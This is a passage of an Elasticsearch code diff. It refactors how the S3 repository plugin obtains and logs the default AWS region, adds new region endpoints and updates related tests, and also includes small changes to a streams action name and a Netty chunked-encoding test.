endpoint") +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class AzureBlobStoreRepositoryTests extends ESMockAPIBasedRepositoryIntegTestCase { protected static final String DEFAULT_ACCOUNT_NAME = "account"; diff --git a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java index 947f73c2ce580..5e3cad4534b7c 100644 --- a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java +++ b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java @@ -18,12 +18,14 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.repositories.RepositoryVerificationException; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Collection; import static org.hamcrest.Matchers.allOf; import static org.hamcrest.Matchers.containsString; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class AzureRepositoryMissingCredentialsIT extends ESIntegTestCase { @Override diff --git a/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java b/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java index 420794ed75d75..f879477ab064b 100644 --- a/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java +++ b/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java @@ -12,6 +12,7 @@ import software.amazon.awssdk.auth.credentials.AwsCredentials; import software.amazon.awssdk.auth.credentials.AwsCredentialsProvider; import software.amazon.awssdk.http.SdkHttpClient; +import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.s3.S3Client; import org.apache.logging.log4j.LogManager; @@ -306,7 +307,7 @@ public static final class ProxyS3Service extends S3Service { ProjectResolver projectResolver, ResourceWatcherService resourceWatcherService ) { - super(environment, clusterService, projectResolver, resourceWatcherService, () -> null); + super(environment, clusterService, projectResolver, resourceWatcherService, () -> Region.of(randomIdentifier())); } @Override diff --git a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolder.java b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolder.java new file mode 100644 index 0000000000000..9a76616c3afb6 --- /dev/null +++ b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolder.java @@ -0,0 +1,61 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.repositories.s3; + +import software.amazon.awssdk.regions.Region; + +import org.elasticsearch.common.util.concurrent.RunOnce; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; + +import java.util.function.Supplier; + +/** + * Holds onto the {@link Region} provided by the given supplier (think: the AWS SDK's default provider chain) in case it's needed for a S3 + * repository. If the supplier fails with an exception, the first call to {@link #getDefaultRegion} will log a warning message recording + * the exception. + */ +class S3DefaultRegionHolder { + + private static final Logger logger = LogManager.getLogger(S3DefaultRegionHolder.class); + + // no synchronization required, assignments happen in start() which happens-before all reads + private Region defaultRegion; + private Runnable defaultRegionFailureLogger = () -> {}; + + private final Runnable initializer; + + /** + * @param delegateRegionSupplier Supplies a non-null {@link Region} or throws a {@link RuntimeException}. + *

+ * Retained until its first-and-only invocation when {@link #start()} is called, and then released. + */ + S3DefaultRegionHolder(Supplier delegateRegionSupplier) { + initializer = new RunOnce(() -> { + try { + defaultRegion = delegateRegionSupplier.get(); + assert defaultRegion != null; + } catch (Exception e) { + defaultRegion = null; + defaultRegionFailureLogger = new RunOnce(() -> logger.warn("failed to obtain region from default provider chain", e)); + } + }); + } + + void start() { + initializer.run(); + } + + Region getDefaultRegion() { + assert defaultRegion != null || defaultRegionFailureLogger instanceof RunOnce : "not initialized"; + defaultRegionFailureLogger.run(); + return defaultRegion; + } +} diff --git a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java index ab836040efa9a..59f12d2b9a716 100644 --- a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java +++ b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java @@ -98,12 +98,7 @@ S3Service s3Service( } private static Region getDefaultRegion() { - try { - return DefaultAwsRegionProviderChain.builder().build().getRegion(); - } catch (Exception e) { - logger.info("failed to obtain region from default provider chain", e); - return null; - } + return DefaultAwsRegionProviderChain.builder().build().getRegion(); } @Override diff --git a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java index 51e1681129b82..fc18f4bc97a84 100644 --- a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java +++ b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java @@ -48,7 +48,6 @@ import org.elasticsearch.common.component.AbstractLifecycleComponent; import org.elasticsearch.common.settings.Setting; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.RunOnce; import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; @@ -94,8 +93,7 @@ class S3Service extends AbstractLifecycleComponent { Setting.Property.NodeScope ); - private final Runnable defaultRegionSetter; - private volatile Region defaultRegion; + private final S3DefaultRegionHolder defaultRegionHolder; /** * Use a signer that does not require to pre-read (and checksum) the body of PutObject and UploadPart requests since we can rely on @@ -129,7 +127,7 @@ class S3Service extends AbstractLifecycleComponent { compareAndExchangeTimeToLive = REPOSITORY_S3_CAS_TTL_SETTING.get(nodeSettings); compareAndExchangeAntiContentionDelay = REPOSITORY_S3_CAS_ANTI_CONTENTION_DELAY_SETTING.get(nodeSettings); isStateless = DiscoveryNode.isStateless(nodeSettings); - defaultRegionSetter = new RunOnce(() -> defaultRegion = defaultRegionSupplier.get()); + defaultRegionHolder = new S3DefaultRegionHolder(defaultRegionSupplier); s3ClientsManager = new S3ClientsManager( nodeSettings, this::buildClientReference, @@ -266,7 +264,7 @@ Region getClientRegion(S3ClientSettings clientSettings) { } else { endpointDescription = "no configured endpoint"; } - final var defaultRegion = this.defaultRegion; + final var defaultRegion = defaultRegionHolder.getDefaultRegion(); if (defaultRegion != null) { LOGGER.debug(""" found S3 client with no configured region and {}, using region [{}] from SDK""", endpointDescription, defaultRegion); @@ -415,7 +413,7 @@ public void onBlobStoreClose(@Nullable ProjectId projectId) { @Override protected void doStart() { - defaultRegionSetter.run(); + defaultRegionHolder.start(); } @Override diff --git a/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt b/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt index 3fae5c314c10b..5ca027a5f4a13 100644 --- a/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt +++ b/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt @@ -6,6 +6,10 @@ ap-east-1 s3-fips.ap-east-1.amazonaws.com ap-east-1 s3-fips.dualstack.ap-east-1.amazonaws.com ap-east-1 s3.ap-east-1.amazonaws.com ap-east-1 s3.dualstack.ap-east-1.amazonaws.com +ap-east-2 s3-fips.ap-east-2.amazonaws.com +ap-east-2 s3-fips.dualstack.ap-east-2.amazonaws.com +ap-east-2 s3.ap-east-2.amazonaws.com +ap-east-2 s3.dualstack.ap-east-2.amazonaws.com ap-northeast-1 s3-fips.ap-northeast-1.amazonaws.com ap-northeast-1 s3-fips.dualstack.ap-northeast-1.amazonaws.com ap-northeast-1 s3.ap-northeast-1.amazonaws.com @@ -56,6 +60,14 @@ aws-iso-b-global s3-fips.aws-iso-b-global.sc2s.sgov.gov aws-iso-b-global s3-fips.dualstack.aws-iso-b-global.sc2s.sgov.gov aws-iso-b-global s3.aws-iso-b-global.sc2s.sgov.gov aws-iso-b-global s3.dualstack.aws-iso-b-global.sc2s.sgov.gov +aws-iso-e-global s3-fips.aws-iso-e-global.cloud.adc-e.uk +aws-iso-e-global s3-fips.dualstack.aws-iso-e-global.cloud.adc-e.uk +aws-iso-e-global s3.aws-iso-e-global.cloud.adc-e.uk +aws-iso-e-global s3.dualstack.aws-iso-e-global.cloud.adc-e.uk +aws-iso-f-global s3-fips.aws-iso-f-global.csp.hci.ic.gov +aws-iso-f-global s3-fips.dualstack.aws-iso-f-global.csp.hci.ic.gov +aws-iso-f-global s3.aws-iso-f-global.csp.hci.ic.gov +aws-iso-f-global s3.dualstack.aws-iso-f-global.csp.hci.ic.gov aws-iso-global s3-fips.aws-iso-global.c2s.ic.gov aws-iso-global s3-fips.dualstack.aws-iso-global.c2s.ic.gov aws-iso-global s3.aws-iso-global.c2s.ic.gov @@ -76,6 +88,10 @@ cn-north-1 s3.cn-north-1.amazonaws.com.cn cn-north-1 s3.dualstack.cn-north-1.amazonaws.com.cn cn-northwest-1 s3.cn-northwest-1.amazonaws.com.cn cn-northwest-1 s3.dualstack.cn-northwest-1.amazonaws.com.cn +eusc-de-east-1 s3-fips.eusc-de-east-1.amazonaws.eu +eusc-de-east-1 s3-fips.dualstack.eusc-de-east-1.amazonaws.eu +eusc-de-east-1 s3.eusc-de-east-1.amazonaws.eu +eusc-de-east-1 s3.dualstack.eusc-de-east-1.amazonaws.eu eu-central-1 s3-fips.dualstack.eu-central-1.amazonaws.com eu-central-1 s3-fips.eu-central-1.amazonaws.com eu-central-1 s3.dualstack.eu-central-1.amazonaws.com diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java index 9fe0c40c83979..402181878b600 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java @@ -9,6 +9,11 @@ package org.elasticsearch.repositories.s3; +import software.amazon.awssdk.endpoints.Endpoint; +import software.amazon.awssdk.regions.Region; +import software.amazon.awssdk.services.s3.endpoints.S3EndpointParams; +import software.amazon.awssdk.services.s3.endpoints.internal.DefaultS3EndpointProvider; + import org.elasticsearch.core.Nullable; import org.elasticsearch.test.ESTestCase; @@ -23,6 +28,14 @@ public void testRegionGuessing() { assertRegionGuess("random.endpoint.internal.net", null); } + public void testHasEntryForEachRegion() { + final var defaultS3EndpointProvider = new DefaultS3EndpointProvider(); + for (var region : Region.regions()) { + final Endpoint endpoint = safeGet(defaultS3EndpointProvider.resolveEndpoint(S3EndpointParams.builder().region(region).build())); + assertNotNull(region.id(), RegionFromEndpointGuesser.guessRegion(endpoint.url().toString())); + } + } + private static void assertRegionGuess(String endpoint, @Nullable String expectedRegion) { assertEquals(endpoint, expectedRegion, RegionFromEndpointGuesser.guessRegion(endpoint)); } diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java index 8cc19fd4c870d..4da5cb43e7f44 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java @@ -101,6 +101,7 @@ import static org.elasticsearch.repositories.s3.S3ClientSettings.MAX_CONNECTIONS_SETTING; import static org.elasticsearch.repositories.s3.S3ClientSettings.MAX_RETRIES_SETTING; import static org.elasticsearch.repositories.s3.S3ClientSettings.READ_TIMEOUT_SETTING; +import static org.elasticsearch.repositories.s3.S3ClientSettingsTests.DEFAULT_REGION_UNAVAILABLE; import static org.hamcrest.Matchers.allOf; import static org.hamcrest.Matchers.anyOf; import static org.hamcrest.Matchers.contains; @@ -134,7 +135,7 @@ public void setUp() throws Exception { ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), TestProjectResolvers.DEFAULT_PROJECT_ONLY, Mockito.mock(ResourceWatcherService.class), - () -> null + DEFAULT_REGION_UNAVAILABLE ) { private InetAddress[] resolveHost(String host) throws UnknownHostException { assertEquals("127.0.0.1", host); @@ -1323,7 +1324,7 @@ public void testRetryOn403InStateless() { ), TestProjectResolvers.DEFAULT_PROJECT_ONLY, Mockito.mock(ResourceWatcherService.class), - () -> null + DEFAULT_REGION_UNAVAILABLE ); service.start(); recordingMeterRegistry = new RecordingMeterRegistry(); diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java index 26b9aab5569e1..927ef00b1106a 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java @@ -13,6 +13,7 @@ import software.amazon.awssdk.auth.credentials.AwsSessionCredentials; import software.amazon.awssdk.regions.Region; +import org.elasticsearch.ElasticsearchException; import org.elasticsearch.cluster.project.TestProjectResolvers; import org.elasticsearch.common.settings.MockSecureSettings; import org.elasticsearch.common.settings.Settings; @@ -24,6 +25,7 @@ import org.mockito.Mockito; import java.util.Map; +import java.util.function.Supplier; import static org.hamcrest.Matchers.contains; import static org.hamcrest.Matchers.emptyString; @@ -190,9 +192,11 @@ public void testRegionCanBeSet() { ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), TestProjectResolvers.DEFAULT_PROJECT_ONLY, Mockito.mock(ResourceWatcherService.class), - () -> null + DEFAULT_REGION_UNAVAILABLE ) ) { + s3Service.start(); + var otherSettings = settings.get("other"); Region otherRegion = s3Service.getClientRegion(otherSettings); assertEquals(randomRegion, otherRegion.toString()); @@ -213,4 +217,8 @@ public void testMaxConnectionsCanBeSet() { // the default appears in the docs so let's make sure it doesn't change: assertEquals(50, S3ClientSettings.Defaults.MAX_CONNECTIONS); } + + public static final Supplier DEFAULT_REGION_UNAVAILABLE = () -> { + throw new ElasticsearchException("default region unavailable in this test"); + }; } diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolderTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolderTests.java new file mode 100644 index 0000000000000..3471ce0205b06 --- /dev/null +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolderTests.java @@ -0,0 +1,85 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.repositories.s3; + +import software.amazon.awssdk.regions.Region; + +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.core.LogEvent; +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.MockLog; + +import java.util.concurrent.atomic.AtomicBoolean; + +public class S3DefaultRegionHolderTests extends ESTestCase { + public void testSuccess() { + try (var mockLog = MockLog.capture(S3DefaultRegionHolder.class)) { + mockLog.addExpectation(new NoLogEventsExpectation()); + + final var region = Region.of(randomIdentifier()); + final var regionSupplied = new AtomicBoolean(); + final var regionHolder = new S3DefaultRegionHolder(() -> { + assertTrue(regionSupplied.compareAndSet(false, true)); // only called once + return region; + }); + + regionHolder.start(); + assertTrue(regionSupplied.get()); + assertSame(region, regionHolder.getDefaultRegion()); + assertSame(region, regionHolder.getDefaultRegion()); + + mockLog.assertAllExpectationsMatched(); + } + } + + public void testFailure() { + try (var mockLog = MockLog.capture(S3DefaultRegionHolder.class)) { + final var warningSeenExpectation = new MockLog.EventuallySeenEventExpectation( + "warning", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "failed to obtain region from default provider chain" + ); + mockLog.addExpectation(warningSeenExpectation); + + final var regionSupplied = new AtomicBoolean(); + final var regionHolder = new S3DefaultRegionHolder(() -> { + assertTrue(regionSupplied.compareAndSet(false, true)); // only called once + throw new ElasticsearchException("simulated"); + }); + + regionHolder.start(); + assertTrue(regionSupplied.get()); + + warningSeenExpectation.setExpectSeen(); // not seen yet, but will be seen now + regionHolder.getDefaultRegion(); + + mockLog.addExpectation(new NoLogEventsExpectation()); // log message not duplicated + regionHolder.getDefaultRegion(); + + mockLog.assertAllExpectationsMatched(); + } + } + + private static class NoLogEventsExpectation implements MockLog.LoggingExpectation { + private boolean seenLogEvent; + + @Override + public void match(LogEvent event) { + seenLogEvent = true; + } + + @Override + public void assertMatched() { + assertFalse(seenLogEvent); + } + } +} diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java index d41631a79739f..7beb5ec58af20 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.repositories.s3; import software.amazon.awssdk.http.SdkHttpClient; +import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.s3.S3Client; import org.elasticsearch.cluster.metadata.ProjectId; @@ -68,7 +69,7 @@ private static class DummyS3Service extends S3Service { ProjectResolver projectResolver, ResourceWatcherService resourceWatcherService ) { - super(environment, clusterService, projectResolver, resourceWatcherService, () -> null); + super(environment, clusterService, projectResolver, resourceWatcherService, () -> Region.of(randomIdentifier())); } @Override diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java index 6c663c1594102..e7e0e206aa24b 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java @@ -19,6 +19,8 @@ import software.amazon.awssdk.services.s3.model.S3Exception; import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.core.LogEvent; +import org.elasticsearch.ElasticsearchException; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.cluster.metadata.RepositoryMetadata; import org.elasticsearch.cluster.project.TestProjectResolvers; @@ -33,7 +35,6 @@ import org.elasticsearch.test.junit.annotations.TestLogging; import org.elasticsearch.watcher.ResourceWatcherService; -import java.io.IOException; import java.net.URI; import java.util.concurrent.atomic.AtomicBoolean; @@ -42,7 +43,7 @@ public class S3ServiceTests extends ESTestCase { - public void testCachedClientsAreReleased() throws IOException { + public void testCachedClientsAreReleased() { final S3Service s3Service = new S3Service( mock(Environment.class), ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), @@ -107,30 +108,45 @@ public void testGetClientRegionFromSetting() { mock(ResourceWatcherService.class), () -> { assertTrue(regionRequested.compareAndSet(false, true)); - return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier()), null); + if (randomBoolean()) { + throw new ElasticsearchException("simulated"); + } else { + return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier())); + } } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { + mockLog.addExpectation( + new MockLog.UnseenEventExpectation( + "no default region warning", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "*" + ) + ); + s3Service.start(); assertTrue(regionRequested.get()); final var clientName = randomBoolean() ? "default" : randomIdentifier(); final var region = randomBoolean() ? randomFrom(Region.regions()) : Region.of(randomIdentifier()); - MockLog.assertThatLogger( - () -> assertSame( - region, - s3Service.getClientRegion( - S3ClientSettings.getClientSettings( - Settings.builder().put("s3.client." + clientName + ".region", region.id()).build(), - clientName - ) + + mockLog.addExpectation(new MockLog.UnseenEventExpectation("no warning", S3Service.class.getCanonicalName(), Level.WARN, "*")); + mockLog.addExpectation(new MockLog.UnseenEventExpectation("no debug", S3Service.class.getCanonicalName(), Level.DEBUG, "*")); + + assertSame( + region, + s3Service.getClientRegion( + S3ClientSettings.getClientSettings( + Settings.builder().put("s3.client." + clientName + ".region", region.id()).build(), + clientName ) - ), - S3Service.class, - new MockLog.UnseenEventExpectation("no warning", S3Service.class.getCanonicalName(), Level.WARN, "*"), - new MockLog.UnseenEventExpectation("no debug", S3Service.class.getCanonicalName(), Level.DEBUG, "*") + ) ); + + mockLog.assertAllExpectationsMatched(); } } @@ -145,10 +161,24 @@ public void testGetClientRegionFromEndpointSettingGuess() { mock(ResourceWatcherService.class), () -> { assertTrue(regionRequested.compareAndSet(false, true)); - return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier()), null); + if (randomBoolean()) { + throw new ElasticsearchException("simulated"); + } else { + return randomFrom(randomFrom(Region.regions()), Region.of(randomIdentifier())); + } } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { + mockLog.addExpectation( + new MockLog.UnseenEventExpectation( + "no default region warning", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "*" + ) + ); + s3Service.start(); assertTrue(regionRequested.get()); @@ -163,18 +193,7 @@ public void testGetClientRegionFromEndpointSettingGuess() { ).url(); final var endpoint = randomFrom(endpointUrl.toString(), endpointUrl.getHost()); - MockLog.assertThatLogger( - () -> assertEquals( - endpoint, - guessedRegion, - s3Service.getClientRegion( - S3ClientSettings.getClientSettings( - Settings.builder().put("s3.client." + clientName + ".endpoint", endpoint).build(), - clientName - ) - ) - ), - S3Service.class, + mockLog.addExpectation( new MockLog.SeenEventExpectation( endpoint + " -> " + guessedRegion, S3Service.class.getCanonicalName(), @@ -188,6 +207,18 @@ public void testGetClientRegionFromEndpointSettingGuess() { ) ) ); + assertEquals( + endpoint, + guessedRegion, + s3Service.getClientRegion( + S3ClientSettings.getClientSettings( + Settings.builder().put("s3.client." + clientName + ".endpoint", endpoint).build(), + clientName + ) + ) + ); + + mockLog.assertAllExpectationsMatched(); } } @@ -205,16 +236,24 @@ public void testGetClientRegionFromDefault() { assertTrue(regionRequested.compareAndSet(false, true)); return defaultRegion; } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { + mockLog.addExpectation( + new MockLog.UnseenEventExpectation( + "no default region warning", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "*" + ) + ); + s3Service.start(); assertTrue(regionRequested.get()); final var clientName = randomBoolean() ? "default" : randomIdentifier(); - MockLog.assertThatLogger( - () -> assertSame(defaultRegion, s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))), - S3Service.class, + mockLog.addExpectation( new MockLog.SeenEventExpectation( "warning", S3Service.class.getCanonicalName(), @@ -224,12 +263,17 @@ public void testGetClientRegionFromDefault() { + "] from SDK" ) ); + + assertSame(defaultRegion, s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))); + + mockLog.assertAllExpectationsMatched(); } } @TestLogging(reason = "testing WARN log output", value = "org.elasticsearch.repositories.s3.S3Service:WARN") public void testGetClientRegionFallbackToUsEast1() { final var regionRequested = new AtomicBoolean(); + final var exceptionMessage = randomIdentifier(); try ( var s3Service = new S3Service( mock(Environment.class), @@ -238,23 +282,39 @@ public void testGetClientRegionFallbackToUsEast1() { mock(ResourceWatcherService.class), () -> { assertTrue(regionRequested.compareAndSet(false, true)); - return null; + throw new ElasticsearchException(exceptionMessage); } - ) + ); + var mockLog = MockLog.capture(S3Service.class, S3DefaultRegionHolder.class) ) { s3Service.start(); assertTrue(regionRequested.get()); final var clientName = randomBoolean() ? "default" : randomIdentifier(); - MockLog.assertThatLogger( - () -> assertNull(s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))), - S3Service.class, - new MockLog.SeenEventExpectation("warning", S3Service.class.getCanonicalName(), Level.WARN, """ - found S3 client with no configured region and no configured endpoint, \ - falling back to [us-east-1] and enabling cross-region access; \ - to suppress this warning, configure the [s3.client.CLIENT_NAME.region] setting on this node""") + mockLog.addExpectation( + new MockLog.SeenEventExpectation( + "default provider chain failure", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "failed to obtain region from default provider chain" + ) { + @Override + public void match(LogEvent event) { + if (event.getThrown() instanceof ElasticsearchException e && exceptionMessage.equals(e.getMessage())) { + super.match(event); + } + } + } ); + mockLog.addExpectation(new MockLog.SeenEventExpectation("warning", S3Service.class.getCanonicalName(), Level.WARN, """ + found S3 client with no configured region and no configured endpoint, \ + falling back to [us-east-1] and enabling cross-region access; \ + to suppress this warning, configure the [s3.client.CLIENT_NAME.region] setting on this node""")); + + assertNull(s3Service.getClientRegion(S3ClientSettings.getClientSettings(Settings.EMPTY, clientName))); + + mockLog.assertAllExpectationsMatched(); } } @@ -302,15 +362,20 @@ public void testEndpointOverrideSchemeUsesHttpIfHttpProtocolSpecified() { } private URI getEndpointUri(Settings.Builder settings, String clientName) { - return new S3Service( - mock(Environment.class), - ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), - TestProjectResolvers.DEFAULT_PROJECT_ONLY, - mock(ResourceWatcherService.class), - () -> Region.of(randomIdentifier()) - ).buildClient(S3ClientSettings.getClientSettings(settings.build(), clientName), mock(SdkHttpClient.class)) - .serviceClientConfiguration() - .endpointOverride() - .get(); + try ( + var s3Service = new S3Service( + mock(Environment.class), + ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), + TestProjectResolvers.DEFAULT_PROJECT_ONLY, + mock(ResourceWatcherService.class), + () -> Region.of(randomIdentifier()) + ) + ) { + s3Service.start(); + return s3Service.buildClient(S3ClientSettings.getClientSettings(settings.build(), clientName), mock(SdkHttpClient.class)) + .serviceClientConfiguration() + .endpointOverride() + .get(); + } } } diff --git a/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java b/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java index 95a1783ac0452..4b60c088980e9 100644 --- a/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java +++ b/modules/streams/src/main/java/org/elasticsearch/rest/streams/logs/StreamsStatusAction.java @@ -26,7 +26,7 @@ public class StreamsStatusAction { - public static ActionType INSTANCE = new ActionType<>("cluster:admin/streams/status"); + public static ActionType INSTANCE = new ActionType<>("cluster:monitor/streams/status"); public static class Request extends LocalClusterStateRequest { protected Request(TimeValue masterTimeout) { diff --git a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java index 1f783a0c30d4c..1a8f33f57a5db 100644 --- a/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java +++ b/modules/transport-netty4/src/internalClusterTest/java/org/elasticsearch/http/netty4/Netty4IncrementalRequestHandlingIT.java @@ -85,6 +85,7 @@ import org.elasticsearch.transport.netty4.Netty4Utils; import org.elasticsearch.xcontent.json.JsonXContent; +import java.io.InputStream; import java.nio.channels.ClosedChannelException; import java.nio.charset.StandardCharsets; import java.util.Collection; @@ -392,6 +393,23 @@ public void testOversizedChunkedEncoding() throws Exception { } } + public void testEmptyChunkedEncoding() throws Exception { + try (var clientContext = newClientContext()) { + var opaqueId = clientContext.newOpaqueId(); + final var emptyStream = new HttpChunkedInput(new ChunkedStream(InputStream.nullInputStream())); + final var request = httpRequest(opaqueId, 0); + HttpUtil.setTransferEncodingChunked(request, true); + clientContext.channel().pipeline().addLast(new ChunkedWriteHandler()); + clientContext.channel().writeAndFlush(request); + clientContext.channel().writeAndFlush(emptyStream); + + var handler = clientContext.awaitRestChannelAccepted(opaqueId); + var restRequest = handler.restRequest; + assertFalse(restRequest.hasContent()); + assertNull(restRequest.header("Transfer-Encoding")); + } + } + // ensures that we don't leak buffers in stream on 400-bad-request // some bad requests are dispatched from rest-controller before reaching rest handler // test relies on netty's buffer leak detection @@ -733,6 +751,7 @@ Channel channel() { static class ServerRequestHandler implements BaseRestHandler.RequestBodyChunkConsumer { final SubscribableListener channelAccepted = new SubscribableListener<>(); final String opaqueId; + final RestRequest restRequest; private final AtomicReference> nextChunkListenerRef = new AtomicReference<>(); final Netty4HttpRequestBodyStream stream; RestChannel channel; @@ -740,8 +759,9 @@ static class ServerRequestHandler implements BaseRestHandler.RequestBodyChunkCon final CountDownLatch closedLatch = new CountDownLatch(1); volatile boolean shouldThrowInsideHandleChunk = false; - ServerRequestHandler(String opaqueId, Netty4HttpRequestBodyStream stream) { + ServerRequestHandler(String opaqueId, RestRequest restRequest, Netty4HttpRequestBodyStream stream) { this.opaqueId = opaqueId; + this.restRequest = 